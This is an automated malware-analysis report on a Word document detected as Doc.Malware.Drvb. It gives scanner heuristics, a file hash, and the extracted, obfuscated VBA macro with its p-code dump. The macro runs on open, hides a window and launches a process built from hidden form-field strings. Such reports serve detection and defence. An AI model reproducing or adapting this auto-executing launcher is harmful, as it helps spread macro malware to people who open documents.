Verdict: MALICIOUS
Risk Score: 190
Heuristics: 7

- ClamAV: Doc.Malware.Drvb-6901569-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Drvb-6901569-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `Set VkCAoD = GetObject(MDQAG_.iXXQQZGA)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub autoopen()`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10503 bytes |

SHA-256: 7decb3ee14e7e59737bb09972709c1a514ac368ac6efc398644e592aaa8f35e9

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "iAAAUxAU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "MDQAG_"
Attribute VB_Base = "0{6A2F53B5-9796-4987-AFA1-C9468714A29A}{93C114CF-DDC9-4BDF-9D5C-225EE3E532C0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "ww_Ax_UU"
Sub autoopen()
On Error Resume Next
If TZQGXAQ = YAUokA_G Then
BkABXBA = 569984726 - ChrB(843076583 * Round(935502368) + iAAkDU - ChrB(D_BQUUAw)) / BAXXA1 / Rnd(469117493 / E14CA_A * SpBb / ChrW(50061209 * CBool(40066218) / 607781978 + CStr(oBA_Q1kk))) / 463721617 * Oct(TAAAxUwc)
End If
If PXcDDAAA = BBcAAB Then
joZZBA = 154354401 - ChrB(471567218 * Round(31201927) + HQC_GDo - ChrB(JQ4oGQQ)) / TUDwUx / Rnd(486658445 / RAC4wBkx * SpBb / ChrW(626150991 * CBool(62483571) / 112118660 + CStr(Oo1AAAAB))) / 321450386 * Oct(SAAAAACc)
End If
Set VkCAoD = GetObject(MDQAG_.iXXQQZGA)
If cAcADQ = zUwUAXA Then
wA4wAUBA = 453134110 - ChrB(140329015 * Round(871179875) + kDXQXAU - ChrB(iAAoBQAA)) / HD_AAA / Rnd(410789545 / UAUwDBc * SpBb / ChrW(129918205 * CBool(186648157) / 638284754 + CStr(QXAAACAB))) / 773641774 * Oct(S4D1A_A)
End If
If jZAUAw = CDcBZ4D_ Then
oZAwQQ = 856467553 - ChrB(496823596 * Round(490173833) + sAA1QBCx - ChrB(dGDoAkcc)) / p4GDkAAA / Rnd(792389568 / mAUX1XA * SpBb / ChrW(988484813 * CBool(39158236) / 120920582 + CStr(VwB_ABU))) / 870481188 * Oct(dAAAUXX)
End If
VkCAoD.ShowWindow = 64970 - 64970
If Xc_GAc = po1A4A Then
AXAUAA = 251164414 - ChrB(651805126 * Round(712340283) + wZAxxAD - ChrB(MoABAU4A)) / FBABAG / Rnd(255677085 / hAACQU * SpBb / ChrW(856406598 * CBool(528235425) / 51027830 + CStr(oQxZAk))) / 938647101 * Oct(SXX__U)
End If
If DAAAQZ_ = ACA1A_ Then
YACB4B = 629097278 - ChrB(712483311 * Round(804737756) + HAB4DAA - ChrB(jBAc_A4)) / qoAUA4A / Rnd(905399602 / DAAcAAQ * SpBb / ChrW(767340703 * CBool(187238390) / 336030284 + CStr(uUB_AACD))) / 302304842 * Oct(DcDAAXwC)
End If
If r4UAC_AZ = hDQXDAAU Then
JoZQAwG = 169749046 - ChrB(837101191 * Round(180256317) + sACAD4Q - ChrB(kU4AABD)) / PAxAAck / Rnd(911574048 / poGAAAQD * SpBb / ChrW(226780371 * CBool(552201874) / 66690612 + CStr(cA_AoAo))) / 382562619 * Oct(Zo_DAA)
End If
GetObject(MDQAG_.w4ZAQG_).Create% sAQUcQAA + MDQAG_.rAAwU1 + IQXBXA_B + MDQAG_.HACUDUC + aQAcoA + MDQAG_.IAAAGQAX + S_kUG4X, DQADAXw, VkCAoD, JAxQxA
If zAQxADBU = VQXZwAZ Then
AAACADU = 566589316 - ChrB(426537712 * Round(756681998) + MA41X41A - ChrB(z1oDAUAB)) / zQAAAX / Rnd(789471137 / pkCkUX * SpBb / ChrW(342247120 * CBool(592197169) / 220856248 + CStr(KDxAQ4D))) / 383850561 * Oct(NBBkBUUQ)
End If
If vBADoA = EAxAQAA Then
kAQDX1oo = 537583213 - ChrB(350008565 * Round(978413243) + lAQQA4 - ChrB(sc4UG1UU)) / ID4U_cQA / Rnd(259650783 / RAUxAQ * SpBb / ChrW(183434635 * CBool(712580351) / 5986436 + CStr(aoBXXcQx))) / 178995178 * Oct(UAAQADBc)
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/4edd39f9b12d45a1a3e37e967facea9d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/iAAAUxAU - 1106 bytes
' Macros/VBA/MDQAG_ - 1157 bytes
' Macros/VBA/ww_Ax_UU - 4742 bytes
' Line #0:
' FuncDefn (Sub ww_Ax_UU())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' Ld TZQGXAQ
' Eq
' IfBlock
' Line #3:
' LitDI4 0x46D6 0x21F9
' LitDI4 0x53E7 0x3240
' LitDI4 0xA220 0x37C2
' ArgsLd Round 0x0001
' Mul
' Ld BkABXBA
' Add
' Ld iAAkDU
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld D_BQUUAw
' Div
' LitDI4 0x2A35 0x1BF6
' Ld BAXXA1
' Div
' Ld SpBb
' Mul
' LitDI4 0xDF99 0x02FB
' LitDI4 0x5CAA 0x0263
' Coerce (Bool)
' Mul
' LitDI4 0x045A 0x243A
' Div
' Ld E14CA_A
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0xD491 0x1BA3
' Div
' Ld oBA_Q1kk
' ArgsLd Oct 0x0001
' Mul
' Sub
' St YAUokA_G
' Line #4:
' EndIfBlock
' Line #5:
' Ld TAAAxUwc
' Ld PXcDDAAA
' Eq
' IfBlock
' Line #6:
' LitDI4 0x42E1 0x0933
' LitDI4 0x8B72 0x1C1B
' LitDI4 0x1A87 0x01DC
' ArgsLd Round 0x0001
' Mul
' Ld joZZBA
' Add
' Ld HQC_GDo
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld JQ4oGQQ
' Div
' LitDI4 0xD18D 0x1D01
' Ld TUDwUx
' Div
' Ld SpBb
' Mul
' LitDI4 0x4E4F 0x2552
' LitDI4 0x6C73 0x03B9
' Coerce (Bool)
' Mul
' LitDI4 0xCB84 0x06AE
' Div
' Ld RAC4wBkx
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0xF192 0x1328
' Div
' Ld Oo1AAAAB
' ArgsLd Oct 0x0001
' Mul
' Sub
' St BBcAAB
' Line #7:
' EndIfBlock
' Line #8:
' SetStmt
' Ld MSForms
' MemLd GetObject
' ArgsLd VkCAoD 0x0001
' Set SAAAAACc
' Line #9:
' Ld iXXQQZGA
' Ld cAcADQ
' Eq
' IfBlock
' Line #10:
' LitDI4 0x471E 0x1B02
' LitDI4 0x4037 0x085D
' LitDI4 0x2663 0x33ED
' ArgsLd Round 0x0001
' Mul
' Ld wA4wAUBA
' Add
' Ld kDXQXAU
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld iAAoBQAA
' Div
' LitDI4 0x26A9 0x187C
' Ld HD_AAA
' Div
' Ld SpBb
' Mul
' LitDI4 0x64FD 0x07BE
' LitDI4 0x065D 0x0B20
' Coerce (Bool)
' Mul
' LitDI4 0x73D2 0x260B
' Div
' Ld UAUwDBc
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0xD62E 0x2E1C
' Div
' Ld QXAAACAB
' ArgsLd Oct 0x0001
' Mul
' Sub
' St zUwUAXA
' Line #11:
' EndIfBlock
' Line #12:
' Ld S4D1A_A
' Ld jZAUAw
' Eq
' IfBlock
' Line #13:
' LitDI4 0xA861 0x330C
' LitDI4 0xED2C 0x1D9C
' LitDI4 0x7589 0x1D37
' ArgsLd Round 0x0001
' Mul
' Ld oZAwQQ
' Add
' Ld sAA1QBCx
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld dGDoAkcc
' Div
' LitDI4 0xE7C0 0x2F3A
' Ld p4GDkAAA
' Div
' Ld SpBb
' Mul
' LitDI4 0x14CD 0x3AEB
' LitDI4 0x81DC 0x0255
' Coerce (Bool)
' Mul
' LitDI4 0x1A06 0x0735
' Div
' Ld mAUX1XA
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x7D24 0x33E2
' Div
' Ld VwB_ABU
' ArgsLd Oct 0x0001
' Mul
' Sub
' St CDcBZ4D_
' Line #14:
' EndIfBlock
' Line #15:
' LitDI4 0xFDCA 0x0000
' LitDI4 0xFDCA 0x0000
' Sub
' Ld SAAAAACc
' MemSt dAAAUXX
' Line #16:
' Ld ShowWindow
' Ld Xc_GAc
' Eq
' IfBlock
' Line #17:
' LitDI4 0x76FE 0x0EF8
' LitDI4 0xC1C6 0x26D9
' LitDI4 0x733B 0x2A75
' ArgsLd Round 0x0001
' Mul
' Ld AXAUAA
' Add
' Ld wZAxxAD
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld MoABAU4A
' Div
' LitDI4 0x529D 0x0F3D
' Ld FBABAG
' Div
' Ld SpBb
' Mul
' LitDI4 0xBA46 0x330B
' LitDI4 0x3BA1 0x1F7C
' Coerce (Bool)
' Mul
' LitDI4 0x9F76 0x030A
' Div
' Ld hAACQU
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x9E3D 0x37F2
' Div
' Ld oQxZAk
' ArgsLd Oct 0x0001
' Mul
' Sub
' St po1A4A
' Line #18:
' EndIfBlock
' Line #19:
' Ld SXX__U
' Ld DAAAQZ_
' Eq
' IfBlock
' Line #20:
' LitDI4 0x433E 0x257F
' LitDI4 0xA1EF 0x2A77
' LitDI4 0x52DC 0x2FF7
' ArgsLd Round 0x0001
' Mul
' Ld YACB4B
' Add
' Ld HAB4DAA
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld jBAc_A4
' Div
' LitDI4 0x4D32 0x35F7
' Ld qoAUA4A
' Div
' Ld SpBb
' Mul
' LitDI4 0xB09F 0x2DBC
' LitDI4 0x07F6 0x0B29
' Coerce (Bool)
' Mul
' LitDI4 0x6A4C 0x1407
' Div
' Ld DAAcAAQ
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0xCE4A 0x1204
' Div
' Ld uUB_AACD
' ArgsLd Oct 0x0001
' Mul
' Sub
' St ACA1A_
' Line #21:
' EndIfBlock
' Line #22:
' Ld DcDAAXwC
' Ld r4UAC_AZ
' Eq
' IfBlock
' Line #23:
' LitDI4 0x2A36 0x0A1E
' LitDI4 0x2687 0x31E5
' LitDI4 0x7E3D 0x0ABE
' ArgsLd Round 0x0001
' Mul
' Ld JoZQAwG
' Add
' Ld sACAD4Q
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld kU4AABD
' Div
' LitDI4 0x8420 0x3655
' Ld PAxAAck
' Div
' Ld SpBb
' Mul
' LitDI4 0x64D3 0x0D84
' LitDI4 0xEE92 0x20E9
' Coerce (Bool)
' Mul
' LitDI4 0x9E34 0x03F9
' Div
' Ld poGAAAQD
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x713B 0x16CD
' Div
' Ld cA_AoAo
' ArgsLd Oct 0x0001
' Mul
' Sub
' St hDQXDAAU
' Line #24:
' EndIfBlock
' Line #25:
' Ld Create
' Ld MSForms
' MemLd sAQUcQAA
' Add
' Ld rAAwU1
' Add
' Ld MSForms
' MemLd IQXBXA_B
' Add
' Ld HACUDUC
' Add
' Ld MSForms
' MemLd aQAcoA
' Add
' Ld IAAAGQAX
' Add
' Ld S_kUG4X
' Ld SAAAAACc
' Ld DQADAXw
' Ld MSForms
' MemLd Zo_DAA
' ArgsLd VkCAoD 0x0001
' ArgsMemCall w4ZAQG_% 0x0004
' Line #26:
' Ld JAxQxA
' Ld zAQxADBU
' Eq
' IfBlock
' Line #27:
' LitDI4 0x7784 0x21C5
' LitDI4 0x72F0 0x196C
' LitDI4 0x0D0E 0x2D1A
' ArgsLd Round 0x0001
' Mul
' Ld AAACADU
' Add
' Ld MA41X41A
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld z1oDAUAB
' Div
' LitDI4 0x5FA1 0x2F0E
' Ld zQAAAX
' Div
' Ld SpBb
' Mul
' LitDI4 0x46D0 0x1466
' LitDI4 0x3631 0x234C
' Coerce (Bool)
' Mul
' LitDI4 0xFFB8 0x0D29
' Div
' Ld pkCkUX
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x1841 0x16E1
' Div
' Ld KDxAQ4D
' ArgsLd Oct 0x0001
' Mul
' Sub
' St VQXZwAZ
' Line #28:
' EndIfBlock
' Line #29:
' Ld NBBkBUUQ
' Ld vBADoA
' Eq
' IfBlock
' Line #30:
' LitDI4 0xDE6D 0x200A
' LitDI4 0xB4F5 0x14DC
' LitDI4 0x66BB 0x3A51
' ArgsLd Round 0x0001
' Mul
' Ld kAQDX1oo
' Add
' Ld lAQQA4
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld sc4UG1UU
' Div
' LitDI4 0xF4DF 0x0F79
' Ld ID4U_cQA
' Div
' Ld SpBb
' Mul
' LitDI4 0xFD8B 0x0AEE
' LitDI4 0x1CFF 0x2A79
' Coerce (Bool)
' Mul
' LitDI4 0x5884 0x005B
' Div
' Ld RAUxAQ
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x3FEA 0x0AAB
' Div
' Ld aoBXXcQx
' ArgsLd Oct 0x0001
' Mul
' Sub
' St EAxAQAA
' Line #31:
' EndIfBlock
' Line #32:
' EndSub